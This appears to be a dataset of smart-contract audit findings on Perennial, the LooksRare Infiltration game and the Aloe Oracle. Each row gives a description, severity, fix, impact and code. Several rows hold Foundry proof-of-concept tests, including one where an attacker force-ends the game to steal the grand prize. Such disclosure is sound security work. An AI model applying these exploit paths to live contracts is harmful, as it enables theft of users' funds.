```\\nlibrary TriggerOrderLib {\\n function store(TriggerOrderStorage storage self, TriggerOrder memory newValue) internal {\\n if (newValue.side > type(uint8).max) revert TriggerOrderStorageInvalidError();\\n if (newValue.comparison > type(int8).max) revert TriggerOrderStorageInvalidError();\\n if (newValue.comparison < type(int8).min) revert TriggerOrderStorageInvalidError();\\n if (newValue.fee.gt(UFixed6.wrap(type(uint64).max))) revert TriggerOrderStorageInvalidError();\\n if (newValue.price.gt(Fixed6.wrap(type(int64).max))) revert TriggerOrderStorageInvalidError();\\n if (newValue.price.lt(Fixed6.wrap(type(int64).min))) revert TriggerOrderStorageInvalidError();\\n if (newValue.delta.gt(Fixed6.wrap(type(int64).max))) revert TriggerOrderStorageInvalidError();\\n if (newValue.delta.lt(Fixed6.wrap(type(int64).min))) revert TriggerOrderStorageInvalidError();\\n if (newValue.interfaceFee.amount.gt(UFixed6.wrap(type(uint48).max))) revert TriggerOrderStorageInvalidError();\\n\\n self.value = StoredTriggerOrder(\\n uint8(newValue.side),\\n int8(newValue.comparison),\\n uint64(UFixed6.unwrap(newValue.fee)),\\n int64(Fixed6.unwrap(newValue.price)),\\n int64(Fixed6.unwrap(newValue.delta)),\\n// Remove the line below\\n uint40(UFixed6.unwrap(newValue.interfaceFee.amount)),\\n// Add the line below\\n uint48(UFixed6.unwrap(newValue.interfaceFee.amount)),\\n newValue.interfaceFee.receiver,\\n newValue.interfaceFee.unwrap,\\n bytes11(0)\\n );\\n }\\n```\\n
For orders where `interfaceFee.amount` is greater than `1.1M`, the order can be saved successfully, but the actual storage may be truncated to `0`. This is not what users expect and may lead to incorrect fee payments when the order is executed. Although a fee of `1.1M` is large, it is not impossible.
```\\nstruct StoredTriggerOrder {\\n /* slot 0 */\\n uint8 side; // 0 = maker, 1 = long, 2 = short, 3 = collateral\\n int8 comparison; // -2 = lt, -1 = lte, 0 = eq, 1 = gte, 2 = gt\\n uint64 fee; // <= 18.44tb\\n int64 price; // <= 9.22t\\n int64 delta; // <= 9.22t\\n uint48 interfaceFeeAmount; // <= 281m\\n\\n /* slot 1 */\\n address interfaceFeeReceiver;\\n bool interfaceFeeUnwrap;\\n bytes11 __unallocated0__;\\n}\\n\\nlibrary TriggerOrderLib {\\n function store(TriggerOrderStorage storage self, TriggerOrder memory newValue) internal {\\n if (newValue.side > type(uint8).max) revert TriggerOrderStorageInvalidError();\\n if (newValue.comparison > type(int8).max) revert TriggerOrderStorageInvalidError();\\n if (newValue.comparison < type(int8).min) revert TriggerOrderStorageInvalidError();\\n if (newValue.fee.gt(UFixed6.wrap(type(uint64).max))) revert TriggerOrderStorageInvalidError();\\n if (newValue.price.gt(Fixed6.wrap(type(int64).max))) revert TriggerOrderStorageInvalidError();\\n if (newValue.price.lt(Fixed6.wrap(type(int64).min))) revert TriggerOrderStorageInvalidError();\\n if (newValue.delta.gt(Fixed6.wrap(type(int64).max))) revert TriggerOrderStorageInvalidError();\\n if (newValue.delta.lt(Fixed6.wrap(type(int64).min))) revert TriggerOrderStorageInvalidError();\\n if (newValue.interfaceFee.amount.gt(UFixed6.wrap(type(uint48).max))) revert TriggerOrderStorageInvalidError();\\n\\n self.value = StoredTriggerOrder(\\n uint8(newValue.side),\\n int8(newValue.comparison),\\n uint64(UFixed6.unwrap(newValue.fee)),\\n int64(Fixed6.unwrap(newValue.price)),\\n int64(Fixed6.unwrap(newValue.delta)),\\n uint40(UFixed6.unwrap(newValue.interfaceFee.amount)),\\n newValue.interfaceFee.receiver,\\n newValue.interfaceFee.unwrap,\\n bytes11(0)\\n );\\n }\\n```\\n
vault.claimReward() If have a market without reward token, it may cause all markets to be unable to retrieve rewards.
medium
In `vault.claimReward()`, it will loop through all `market` of `vault` to execute `claimReward()`, and transfer `rewards` to `factory().owner()`. If one of the markets does not have `rewards`, that is, `rewardToken` is not set, `Token18 reward = address(0)`. Currently, the loop does not make this judgment `reward != address(0)`, it will also execute `market.claimReward()`, and the entire method will `revert`. This leads to other markets with `rewards` also being unable to retrieve `rewards`.\\nThe current implementation of `vault.claimReward()` is as follows:\\n```\\n function claimReward() external onlyOwner {\\n for (uint256 marketId; marketId < totalMarkets; marketId++) {\\n _registrations[marketId].read().market.claimReward();\\n _registrations[marketId].read().market.reward().push(factory().owner());\\n }\\n }\\n```\\n\\nWe can see that the method loops through all the `market` and executes `market.claimReward()`, and `reward().push()`.\\nThe problem is, not every market has `rewards` tokens. market.sol's `rewards` are not forcibly set in `initialize()`. The market's `makerRewardRate.makerRewardRate` is also allowed to be 0.\\n```\\ncontract Market is IMarket, Instance, ReentrancyGuard {\\n /// @dev The token that incentive rewards are paid in\\n Token18 public reward;\\n\\n function initialize(IMarket.MarketDefinition calldata definition_) external initializer(1) {\\n __Instance__initialize();\\n __ReentrancyGuard__initialize();\\n\\n token = definition_.token;\\n oracle = definition_.oracle;\\n payoff = definition_.payoff;\\n }\\n// rest of code\\n\\n\\nlibrary MarketParameterStorageLib {\\n// rest of code\\n function validate(\\n MarketParameter memory self,\\n ProtocolParameter memory protocolParameter,\\n Token18 reward\\n ) public pure {\\n if (self.settlementFee.gt(protocolParameter.maxFeeAbsolute)) revert MarketParameterStorageInvalidError();\\n\\n if (self.fundingFee.max(self.interestFee).max(self.positionFee).gt(protocolParameter.maxCut))\\n revert MarketParameterStorageInvalidError();\\n\\n if (self.oracleFee.add(self.riskFee).gt(UFixed6Lib.ONE)) revert MarketParameterStorageInvalidError();\\n\\n if (\\n reward.isZero() &&\\n (!self.makerRewardRate.isZero() || !self.longRewardRate.isZero() || !self.shortRewardRate.isZero())\\n ) revert MarketParameterStorageInvalidError();\\n```\\n\\nThis means that `market.sol` can be without `rewards token`.\\nIf there is such a market, the current `vault.claimReward()` will `revert`, causing other markets with `rewards` to also be unable to retrieve `rewards`.
```\\n function claimReward() external onlyOwner {\\n for (uint256 marketId; marketId < totalMarkets; marketId// Add the line below\\n// Add the line below\\n) {\\n// Add the line below\\n if (_registrations[marketId].read().market.reward().isZero()) continue;\\n _registrations[marketId].read().market.claimReward();\\n _registrations[marketId].read().market.reward().push(factory().owner());\\n }\\n }\\n```\\n
If the `vault` contains markets without `rewards`, it will cause other markets with `rewards` to also be unable to retrieve `rewards`.
```\\n function claimReward() external onlyOwner {\\n for (uint256 marketId; marketId < totalMarkets; marketId++) {\\n _registrations[marketId].read().market.claimReward();\\n _registrations[marketId].read().market.reward().push(factory().owner());\\n }\\n }\\n```\\n
_killWoundedAgents
high
The `_killWoundedAgents` function only checks the status of the agent, not when it was wounded.\\n```\\n function _killWoundedAgents(\\n uint256 roundId,\\n uint256 currentRoundAgentsAlive\\n ) private returns (uint256 deadAgentsCount) {\\n // rest of code\\n for (uint256 i; i < woundedAgentIdsCount; ) {\\n uint256 woundedAgentId = woundedAgentIdsInRound[i.unsafeAdd(1)];\\n\\n uint256 index = agentIndex(woundedAgentId);\\n if (agents[index].status == AgentStatus.Wounded) {\\n // rest of code\\n }\\n\\n // rest of code\\n }\\n\\n emit Killed(roundId, woundedAgentIds);\\n }\\n```\\n\\nSo when `fulfillRandomWords` kills agents that were wounded and unhealed at round `currentRoundId - ROUNDS_TO_BE_WOUNDED_BEFORE_DEAD`, it will also kill the agent who was healed and wounded again after that round.\\nAlso, since `fulfillRandomWords` first draws the new wounded agents before kills agents, in the worst case scenario, agent could die immediately after being wounded in this round.\\n```\\nif (activeAgents > NUMBER_OF_SECONDARY_PRIZE_POOL_WINNERS) {\\n uint256 woundedAgents = _woundRequestFulfilled(\\n currentRoundId,\\n currentRoundAgentsAlive,\\n activeAgents,\\n currentRandomWord\\n );\\n\\n uint256 deadAgentsFromKilling;\\n if (currentRoundId > ROUNDS_TO_BE_WOUNDED_BEFORE_DEAD) {\\n deadAgentsFromKilling = _killWoundedAgents({\\n roundId: currentRoundId.unsafeSubtract(ROUNDS_TO_BE_WOUNDED_BEFORE_DEAD),\\n currentRoundAgentsAlive: currentRoundAgentsAlive\\n });\\n }\\n```\\n\\nThis is the PoC test code. You can add it to the Infiltration.fulfillRandomWords.t.sol file and run it.\\n```\\nfunction test_poc() public {\\n\\n _startGameAndDrawOneRound();\\n\\n uint256[] memory randomWords = _randomWords();\\n uint256[] memory woundedAgentIds;\\n\\n for (uint256 roundId = 2; roundId <= ROUNDS_TO_BE_WOUNDED_BEFORE_DEAD + 1; roundId++) {\\n\\n if(roundId == 2) { // heal agent. only woundedAgentIds[0] dead.\\n (woundedAgentIds, ) = infiltration.getRoundInfo({roundId: 1});\\n assertEq(woundedAgentIds.length, 20);\\n\\n _drawXRounds(1);\\n\\n _heal({roundId: 3, woundedAgentIds: woundedAgentIds});\\n\\n _startNewRound();\\n\\n // everyone except woundedAgentIds[0] is healed\\n uint256 agentIdThatWasKilled = woundedAgentIds[0];\\n\\n IInfiltration.HealResult[] memory healResults = new IInfiltration.HealResult[](20);\\n for (uint256 i; i < 20; i++) {\\n healResults[i].agentId = woundedAgentIds[i];\\n\\n if (woundedAgentIds[i] == agentIdThatWasKilled) {\\n healResults[i].outcome = IInfiltration.HealOutcome.Killed;\\n } else {\\n healResults[i].outcome = IInfiltration.HealOutcome.Healed;\\n }\\n }\\n\\n expectEmitCheckAll();\\n emit HealRequestFulfilled(3, healResults);\\n\\n expectEmitCheckAll();\\n emit RoundStarted(4);\\n\\n randomWords[0] = (69 * 10_000_000_000) + 9_900_000_000; // survival rate 99%, first one gets killed\\n\\n vm.prank(VRF_COORDINATOR);\\n VRFConsumerBaseV2(address(infiltration)).rawFulfillRandomWords(_computeVrfRequestId(3), randomWords);\\n\\n for (uint256 i; i < woundedAgentIds.length; i++) {\\n if (woundedAgentIds[i] != agentIdThatWasKilled) {\\n _assertHealedAgent(woundedAgentIds[i]);\\n }\\n }\\n\\n roundId += 2; // round 2, 3 used for healing\\n }\\n\\n _startNewRound();\\n\\n // Just so that each round has different random words\\n randomWords[0] += roundId;\\n\\n if (roundId == ROUNDS_TO_BE_WOUNDED_BEFORE_DEAD + 1) { // wounded agents at round 1 are healed, only woundedAgentIds[0] was dead.\\n (uint256[] memory woundedAgentIdsFromRound, ) = infiltration.getRoundInfo({\\n roundId: uint40(roundId - ROUNDS_TO_BE_WOUNDED_BEFORE_DEAD)\\n });\\n\\n // find re-wounded agent after healed\\n uint256[] memory woundedAfterHeal = new uint256[](woundedAgentIds.length);\\n uint256 totalWoundedAfterHeal;\\n for (uint256 i; i < woundedAgentIds.length; i ++){\\n uint256 index = infiltration.agentIndex(woundedAgentIds[i]);\\n IInfiltration.Agent memory agent = infiltration.getAgent(index);\\n if (agent.status == IInfiltration.AgentStatus.Wounded) {\\n woundedAfterHeal[i] = woundedAgentIds[i]; // re-wounded agent will be killed\\n totalWoundedAfterHeal++;\\n }\\n else{\\n woundedAfterHeal[i] = 0; // set not wounded again 0\\n }\\n\\n }\\n expectEmitCheckAll();\\n emit Killed(roundId - ROUNDS_TO_BE_WOUNDED_BEFORE_DEAD, woundedAfterHeal);\\n }\\n\\n expectEmitCheckAll();\\n emit RoundStarted(roundId + 1);\\n\\n uint256 requestId = _computeVrfRequestId(uint64(roundId));\\n vm.prank(VRF_COORDINATOR);\\n VRFConsumerBaseV2(address(infiltration)).rawFulfillRandomWords(requestId, randomWords);\\n }\\n}\\n```\\n
Check woundedAt at `_killWoundedAgents`\\n```\\n function _killWoundedAgents(\\n uint256 roundId,\\n uint256 currentRoundAgentsAlive\\n ) private returns (uint256 deadAgentsCount) {\\n // rest of code\\n for (uint256 i; i < woundedAgentIdsCount; ) {\\n uint256 woundedAgentId = woundedAgentIdsInRound[i.unsafeAdd(1)];\\n\\n uint256 index = agentIndex(woundedAgentId);\\n// Remove the line below\\n if (agents[index].status == AgentStatus.Wounded) {\\n// Add the line below\\n if (agents[index].status == AgentStatus.Wounded && agents[index].woundedAt == roundId) {\\n // rest of code\\n }\\n\\n // rest of code\\n }\\n\\n emit Killed(roundId, woundedAgentIds);\\n }\\n```\\n
The user pays tokens to keep the agent alive, but agent will die even if agent success to healed. The user has lost tokens and is forced out of the game.
```\\n function _killWoundedAgents(\\n uint256 roundId,\\n uint256 currentRoundAgentsAlive\\n ) private returns (uint256 deadAgentsCount) {\\n // rest of code\\n for (uint256 i; i < woundedAgentIdsCount; ) {\\n uint256 woundedAgentId = woundedAgentIdsInRound[i.unsafeAdd(1)];\\n\\n uint256 index = agentIndex(woundedAgentId);\\n if (agents[index].status == AgentStatus.Wounded) {\\n // rest of code\\n }\\n\\n // rest of code\\n }\\n\\n emit Killed(roundId, woundedAgentIds);\\n }\\n```\\n
Attacker can steal reward of actual winner by force ending the game
high
Currently following scenario is possible: There is an attacker owning some lower index agents and some higher index agents. There is a normal user owing one agent with an index between the attackers agents. If one of the attackers agents with an lower index gets wounded, he can escape all other agents and will instantly win the game, even if the other User has still one active agent.\\nThis is possible because because the winner is determined by the agent index, and escaping all agents at once wont kill the wounded agent because the game instantly ends.\\nFollowing check inside startNewRound prevents killing of wounded agents by starting a new round:\\n```\\nuint256 activeAgents = gameInfo.activeAgents;\\n if (activeAgents == 1) {\\n revert GameOver();\\n }\\n```\\n\\nFollowing check inside of claimPrize pays price to first ID agent:\\n```\\nuint256 agentId = agents[1].agentId;\\n_assertAgentOwnership(agentId);\\n```\\n\\nSee following POC:\\nPOC\\nPut this into Infiltration.mint.t.sol and run `forge test --match-test forceWin -vvv`\\n```\\nfunction test_forceWin() public {\\n address attacker = address(1337);\\n\\n //prefund attacker and user1\\n vm.deal(user1, PRICE * MAX_MINT_PER_ADDRESS);\\n vm.deal(attacker, PRICE * MAX_MINT_PER_ADDRESS);\\n\\n // MINT some agents\\n vm.warp(_mintStart());\\n // attacker wants to make sure he owns a bunch of agents with low IDs!!\\n vm.prank(attacker);\\n infiltration.mint{value: PRICE * 30}({quantity: 30});\\n // For simplicity we mint only 1 agent to user 1 here, but it could be more, they could get wounded, etc.\\n vm.prank(user1);\\n infiltration.mint{value: PRICE *1}({quantity: 1});\\n //Attacker also wants a bunch of agents with the highest IDs, as they are getting swapped with the killed agents (move forward)\\n vm.prank(attacker);\\n infiltration.mint{value: PRICE * 30}({quantity: 30});\\n \\n vm.warp(_mintEnd());\\n\\n //start the game\\n vm.prank(owner);\\n infiltration.startGame();\\n\\n vm.prank(VRF_COORDINATOR);\\n uint256[] memory randomWords = new uint256[](1);\\n randomWords[0] = 69_420;\\n VRFConsumerBaseV2(address(infiltration)).rawFulfillRandomWords(_computeVrfRequestId(1), randomWords);\\n // Now we are in round 2 we do have 1 wounded agent (but we can imagine any of our agent got wounded, doesn´t really matter)\\n \\n // we know with our HARDCODED RANDOMNESS THAT AGENT 3 gets wounded!!\\n\\n // Whenever we get in a situation, that we own all active agents, but 1 and our agent has a lower index we can instant win the game!!\\n // This is done by escaping all agents, at once, except the lowest index\\n uint256[] memory escapeIds = new uint256[](59);\\n escapeIds[0] = 1;\\n escapeIds[1] = 2;\\n uint256 i = 4; //Scipping our wounded AGENT 3\\n for(; i < 31;) {\\n escapeIds[i-2] = i;\\n unchecked {++i;}\\n }\\n //skipping 31 as this owned by user1\\n unchecked {++i;}\\n for(; i < 62;) {\\n escapeIds[i-3] = i;\\n unchecked {++i;}\\n }\\n vm.prank(attacker);\\n infiltration.escape(escapeIds);\\n\\n (uint16 activeAgents, uint16 woundedAgents, , uint16 deadAgents, , , , , , , ) = infiltration.gameInfo();\\n console.log("Active", activeAgents);\\n assertEq(activeAgents, 1);\\n // This will end the game instantly.\\n //owner should not be able to start new round\\n vm.roll(block.number + BLOCKS_PER_ROUND);\\n vm.prank(owner);\\n vm.expectRevert();\\n infiltration.startNewRound();\\n\\n //Okay so the game is over, makes sense!\\n // Now user1 has the only active AGENT, so he should claim the grand prize!\\n // BUT user1 cannot\\n vm.expectRevert(IInfiltration.NotAgentOwner.selector);\\n vm.prank(user1);\\n infiltration.claimGrandPrize();\\n\\n //instead the attacker can:\\n vm.prank(attacker);\\n infiltration.claimGrandPrize();\\n \\n```\\n
Start a new Round before the real end of game to clear all wounded agents and reorder IDs.
Attacker can steal the grand price of the actual winner by force ending the game trough escapes.\\nThis also introduces problems if there are other players with wounded agents but lower < 50 TokenID, they can claim prices for wounded agents, which will break parts of the game logic.
```\\nuint256 activeAgents = gameInfo.activeAgents;\\n if (activeAgents == 1) {\\n revert GameOver();\\n }\\n```\\n
Agents with Healing Opportunity Will Be Terminated Directly if The `escape` Reduces activeAgents to the Number of `NUMBER_OF_SECONDARY_PRIZE_POOL_WINNERS` or Fewer
medium
In each round, agents have the opportunity to either `escape` or `heal` before the `_requestForRandomness` function is called. However, the order of execution between these two functions is not specified, and anyone can be executed at any time just before `startNewRound`. Typically, this isn't an issue. However, the problem arises when there are only a few Active Agents left in the game.\\nOn one hand, the `heal` function requires that the number of `gameInfo.activeAgents` is greater than `NUMBER_OF_SECONDARY_PRIZE_POOL_WINNERS`.\\n```\\n function heal(uint256[] calldata agentIds) external nonReentrant {\\n _assertFrontrunLockIsOff();\\n//@audit If there are not enough activeAgents, heal is disabled\\n if (gameInfo.activeAgents <= NUMBER_OF_SECONDARY_PRIZE_POOL_WINNERS) {\\n revert HealingDisabled();\\n }\\n```\\n\\nOn the other hand, the `escape` function will directly set the status of agents to "ESCAPE" and reduce the count of `gameInfo.activeAgents`.\\n```\\n function escape(uint256[] calldata agentIds) external nonReentrant {\\n _assertFrontrunLockIsOff();\\n\\n uint256 agentIdsCount = agentIds.length;\\n _assertNotEmptyAgentIdsArrayProvided(agentIdsCount);\\n\\n uint256 activeAgents = gameInfo.activeAgents;\\n uint256 activeAgentsAfterEscape = activeAgents - agentIdsCount;\\n _assertGameIsNotOverAfterEscape(activeAgentsAfterEscape);\\n\\n uint256 currentRoundAgentsAlive = agentsAlive();\\n\\n uint256 prizePool = gameInfo.prizePool;\\n uint256 secondaryPrizePool = gameInfo.secondaryPrizePool;\\n uint256 reward;\\n uint256[] memory rewards = new uint256[](agentIdsCount);\\n\\n for (uint256 i; i < agentIdsCount; ) {\\n uint256 agentId = agentIds[i];\\n _assertAgentOwnership(agentId);\\n\\n uint256 index = agentIndex(agentId);\\n _assertAgentStatus(agents[index], agentId, AgentStatus.Active);\\n\\n uint256 totalEscapeValue = prizePool / currentRoundAgentsAlive;\\n uint256 rewardForPlayer = (totalEscapeValue * _escapeMultiplier(currentRoundAgentsAlive)) /\\n ONE_HUNDRED_PERCENT_IN_BASIS_POINTS;\\n rewards[i] = rewardForPlayer;\\n reward += rewardForPlayer;\\n\\n uint256 rewardToSecondaryPrizePool = (totalEscapeValue.unsafeSubtract(rewardForPlayer) *\\n _escapeRewardSplitForSecondaryPrizePool(currentRoundAgentsAlive)) / ONE_HUNDRED_PERCENT_IN_BASIS_POINTS;\\n\\n unchecked {\\n prizePool = prizePool - rewardForPlayer - rewardToSecondaryPrizePool;\\n }\\n secondaryPrizePool += rewardToSecondaryPrizePool;\\n\\n _swap({\\n currentAgentIndex: index,\\n lastAgentIndex: currentRoundAgentsAlive,\\n agentId: agentId,\\n newStatus: AgentStatus.Escaped\\n });\\n\\n unchecked {\\n --currentRoundAgentsAlive;\\n ++i;\\n }\\n }\\n\\n // This is equivalent to\\n // unchecked {\\n // gameInfo.activeAgents = uint16(activeAgentsAfterEscape);\\n // gameInfo.escapedAgents += uint16(agentIdsCount);\\n // }\\n```\\n\\nThrerefore, if the `heal` function is invoked first then the corresponding Wounded Agents will be healed in function `fulfillRandomWords`. If the `escape` function is invoked first and the number of `gameInfo.activeAgents` becomes equal to or less than `NUMBER_OF_SECONDARY_PRIZE_POOL_WINNERS`, the `heal` function will be disable. This obviously violates the fairness of the game.\\nExample\\nConsider the following situation:\\nAfter Round N, there are 100 agents alive. And, 1 Active Agent wants to `escape` and 10 Wounded Agents want to `heal`.\\nRound N:\\nActive Agents: 51\\nWounded Agents: 49\\nHealing Agents: 0\\nAccording to the order of execution, there are two situations. Please note that the result is calculated only after `_healRequestFulfilled`, so therer are no new wounded or dead agents\\nFirst, invoking `escape` before `heal`. `heal` is disable and all Wounded Agents are killed because there are not enough Active Agents.\\nRound N+1:\\nActive Agents: 50\\nWounded Agents: 0\\nHealing Agents: 0\\nSecond, invoking `heal` before `escape`. Suppose that `heal` saves 5 agents, and we got:\\nRound N+1:\\nActive Agents: 55\\nWounded Agents: 39\\nHealing Agents: 0\\nObviously, different execution orders lead to drastically different outcomes, which affects the fairness of the game.
It is advisable to ensure that the `escape` function is always called after the `heal` function in every round. This guarantees that every wounded agent has the opportunity to `heal` themselves when there are a sufficient number of `activeAgents` at the start of each round. This approach can enhance fairness and gameplay balance.
If some Active Agents choose to escape, causing the count of `activeAgents` to become equal to or less than `NUMBER_OF_SECONDARY_PRIZE_POOL_WINNERS`, the Wounded Agents will lose their final chance to heal themselves.\\nThis situation can significantly impact the game's fairness. The Wounded Agents would have otherwise had the opportunity to heal themselves and continue participating in the game. However, the escape of other agents leads to their immediate termination, depriving them of that chance.
```\\n function heal(uint256[] calldata agentIds) external nonReentrant {\\n _assertFrontrunLockIsOff();\\n//@audit If there are not enough activeAgents, heal is disabled\\n if (gameInfo.activeAgents <= NUMBER_OF_SECONDARY_PRIZE_POOL_WINNERS) {\\n revert HealingDisabled();\\n }\\n```\\n
Wound agent can't invoke heal in the next round
medium
Assume players being marked as wounded in the round `12` , players cannot invoke `heal` in the next round 13\\n```\\n function test_heal_in_next_round_v1() public {\\n _startGameAndDrawOneRound();\\n\\n _drawXRounds(11);\\n\\n\\n (uint256[] memory woundedAgentIds, ) = infiltration.getRoundInfo({roundId: 12});\\n\\n address agentOwner = _ownerOf(woundedAgentIds[0]);\\n looks.mint(agentOwner, HEAL_BASE_COST);\\n\\n vm.startPrank(agentOwner);\\n _grantLooksApprovals();\\n looks.approve(TRANSFER_MANAGER, HEAL_BASE_COST);\\n\\n uint256[] memory agentIds = new uint256[](1);\\n agentIds[0] = woundedAgentIds[0];\\n\\n uint256[] memory costs = new uint256[](1);\\n costs[0] = HEAL_BASE_COST;\\n\\n //get gameInfo\\n (,,,,,uint40 currentRoundId,,,,,) = infiltration.gameInfo();\\n assert(currentRoundId == 13);\\n\\n //get agent Info\\n IInfiltration.Agent memory agentInfo = infiltration.getAgent(woundedAgentIds[0]);\\n assert(agentInfo.woundedAt == 12);\\n\\n //agent can't invoke heal in the next round.\\n vm.expectRevert(IInfiltration.HealingMustWaitAtLeastOneRound.selector);\\n infiltration.heal(agentIds);\\n }\\n```\\n
```\\n // No need to check if the heal deadline has passed as the agent would be killed\\n unchecked {\\n- if (currentRoundId - woundedAt < 2) {\\n- if (currentRoundId - woundedAt < 1) {\\n revert HealingMustWaitAtLeastOneRound();\\n }\\n }\\n```\\n
User have to wait for 1 more round which led to the odds for an Agent to heal successfully start at 99% at Round 1 reduce to 98% at Round 2.
```\\n function test_heal_in_next_round_v1() public {\\n _startGameAndDrawOneRound();\\n\\n _drawXRounds(11);\\n\\n\\n (uint256[] memory woundedAgentIds, ) = infiltration.getRoundInfo({roundId: 12});\\n\\n address agentOwner = _ownerOf(woundedAgentIds[0]);\\n looks.mint(agentOwner, HEAL_BASE_COST);\\n\\n vm.startPrank(agentOwner);\\n _grantLooksApprovals();\\n looks.approve(TRANSFER_MANAGER, HEAL_BASE_COST);\\n\\n uint256[] memory agentIds = new uint256[](1);\\n agentIds[0] = woundedAgentIds[0];\\n\\n uint256[] memory costs = new uint256[](1);\\n costs[0] = HEAL_BASE_COST;\\n\\n //get gameInfo\\n (,,,,,uint40 currentRoundId,,,,,) = infiltration.gameInfo();\\n assert(currentRoundId == 13);\\n\\n //get agent Info\\n IInfiltration.Agent memory agentInfo = infiltration.getAgent(woundedAgentIds[0]);\\n assert(agentInfo.woundedAt == 12);\\n\\n //agent can't invoke heal in the next round.\\n vm.expectRevert(IInfiltration.HealingMustWaitAtLeastOneRound.selector);\\n infiltration.heal(agentIds);\\n }\\n```\\n
fulfillRandomWords() could revert under certain circumstances
medium
Crucial part of my POC is the variable AGENTS_TO_WOUND_PER_ROUND_IN_BASIS_POINTS. I communicated with the protocol's team that they plan to set it to 20 initially but it is possible to have a different value for it in future. For the POC i used 30.\\n```\\nfunction test_fulfillRandomWords_revert() public {\\n _startGameAndDrawOneRound();\\n\\n _drawXRounds(48);\\n \\n uint256 counter = 0;\\n uint256[] memory wa = new uint256[](30);\\n uint256 totalCost = 0;\\n\\n for (uint256 j=2; j <= 6; j++) \\n {\\n (uint256[] memory woundedAgentIds, ) = infiltration.getRoundInfo({roundId: j});\\n\\n uint256[] memory costs = new uint256[](woundedAgentIds.length);\\n for (uint256 i; i < woundedAgentIds.length; i++) {\\n costs[i] = HEAL_BASE_COST;\\n wa[counter] = woundedAgentIds[i];\\n counter++;\\n if(counter > 29) break;\\n }\\n\\n if(counter > 29) break;\\n }\\n \\n \\n totalCost = HEAL_BASE_COST * wa.length;\\n looks.mint(user1, totalCost);\\n\\n vm.startPrank(user1);\\n _grantLooksApprovals();\\n looks.approve(TRANSFER_MANAGER, totalCost);\\n\\n\\n infiltration.heal(wa);\\n vm.stopPrank();\\n\\n _drawXRounds(1);\\n }\\n```\\n\\nI put this test into Infiltration.startNewRound.t.sol and used --gas-report to see that the gas used for fulfillRandomWords exceeds 2 500 000.
A couple of ideas :\\nYou can limit the value of AGENTS_TO_WOUND_PER_ROUND_IN_BASIS_POINTS to a small enough number so that it is 100% sure it will not reach the gas limit.\\nConsider simply storing the randomness and taking more complex follow-on actions in separate contract calls as stated in the "Security Considerations" section of the VRF's docs.
DOS of the protocol and inability to continue the game.
```\\nfunction test_fulfillRandomWords_revert() public {\\n _startGameAndDrawOneRound();\\n\\n _drawXRounds(48);\\n \\n uint256 counter = 0;\\n uint256[] memory wa = new uint256[](30);\\n uint256 totalCost = 0;\\n\\n for (uint256 j=2; j <= 6; j++) \\n {\\n (uint256[] memory woundedAgentIds, ) = infiltration.getRoundInfo({roundId: j});\\n\\n uint256[] memory costs = new uint256[](woundedAgentIds.length);\\n for (uint256 i; i < woundedAgentIds.length; i++) {\\n costs[i] = HEAL_BASE_COST;\\n wa[counter] = woundedAgentIds[i];\\n counter++;\\n if(counter > 29) break;\\n }\\n\\n if(counter > 29) break;\\n }\\n \\n \\n totalCost = HEAL_BASE_COST * wa.length;\\n looks.mint(user1, totalCost);\\n\\n vm.startPrank(user1);\\n _grantLooksApprovals();\\n looks.approve(TRANSFER_MANAGER, totalCost);\\n\\n\\n infiltration.heal(wa);\\n vm.stopPrank();\\n\\n _drawXRounds(1);\\n }\\n```\\n
Oracle.sol: manipulation via increasing Uniswap V3 pool observationCardinality
high
The `Oracle.consult` function takes a `uint40 seed` parameter and can be used in either of two ways:\\nSet the highest 8 bit to a non-zero value to use Uniswap V3's binary search to get observations\\nSet the highest 8 bit to zero and use the lower 32 bits to provide hints and use the more efficient internal `Oracle.observe` function to get the observations\\nThe code for Aloe's `Oracle.observe` function is adapted from Uniswap V3's Oracle library.\\nTo understand this issue it is necessary to understand Uniswap V3's `observationCardinality` concept.\\nA deep dive can be found here.\\nIn short, it is a circular array of variable size. The size of the array can be increased by ANYONE via calling `Pool.increaseObservationCardinalityNext`.\\nThe Uniswap V3 `Oracle.write` function will then take care of actually expanding the array once the current index has reached the end of the array.\\nAs can be seen in this function, uninitialized entries in the array have their timestamp set to `1`.\\nAnd all other values in the observation struct (array element) are set to zero:\\n```\\nstruct Observation {\\n // the block timestamp of the observation\\n uint32 blockTimestamp;\\n // the tick accumulator, i.e. tick * time elapsed since the pool was first initialized\\n int56 tickCumulative;\\n // the seconds per liquidity, i.e. seconds elapsed / max(1, liquidity) since the pool was first initialized\\n uint160 secondsPerLiquidityCumulativeX128;\\n // whether or not the observation is initialized\\n bool initialized;\\n}\\n```\\n\\nHere's an example for a simplified array to illustrate how the Aloe `Oracle.observe` function might read an invalid value:\\n```\\nAssume we are looking for the target=10 timestamp.\\n\\nAnd the observations array looks like this (element values are timestamps):\\n\\n| 12 | 20 | 25 | 30 | 1 | 1 | 1 |\\n\\nThe length of the array is 7.\\n\\nLet's say we provide the index 6 as the seed and the current observationIndex is 3 (i.e. pointing to timestamp 30)\\n\\nThe Oracle.observe function then chooses 1 as the left timestamp and 12 as the right timestamp.\\n\\nThis means the invalid and uninitialized element at index 6 with timestamp 1 will be used to calculate the Oracle values.\\n```\\n\\nHere is the section of the `Oracle.observe` function where the invalid element is used to calculate the result.\\nBy updating the observations (e.g. swaps in the Uniswap pool), an attacker can influence the value that is written on the left of the array, i.e. he can arrange for a scenario such that he can make the Aloe `Oracle` read a wrong value.\\nUpstream this causes the Aloe `Oracle` to continue calculation with `tickCumulatives` and `secondsPerLiquidityCumulativeX128s` haing a corrupted value. Either `secondsPerLiquidityCumulativeX128s[0]`, `tickCumulatives[0]` AND `secondsPerLiquidityCumulativeX128s[1]`, `tickCumulatives[1]` or only `secondsPerLiquidityCumulativeX128s[0]`, `tickCumulatives[0]` are assigned invalid values (depending on what the timestamp on the left of the array is).
The `Oracle.observe` function must not consider observations as valid that have not been initialized.\\nThis means the `initialized` field must be queried here and here and must be skipped over.
The corrupted values are then used in the further calculations in `Oracle.consult` which reports its results upstream to `VolatilityOracle.update` and `VolatilityOracle.consult`, making their way into the core application.\\nThe TWAP price can be inflated such that bad debt can be taken on due to inflated valuation of Uniswap V3 liqudity.\\nBesides that there are virtually endless possibilities for an attacker to exploit this scenario since the Oracle is at the very heart of the Aloe application and it's impossible to foresee all the permutations of values that a determined attacker may use.\\nE.g. the TWAP price is used for liquidations where an incorrect TWAP price can lead to profit. If the protocol expects you to exchange 1 BTC for 10k USDC, then you end up with ~20k profit.\\nSince an attacker can make this scenario occur on purpose by updating the Uniswap observations (e.g. by executing swaps) and increasing observation cardinality, the severity of this finding is "High".
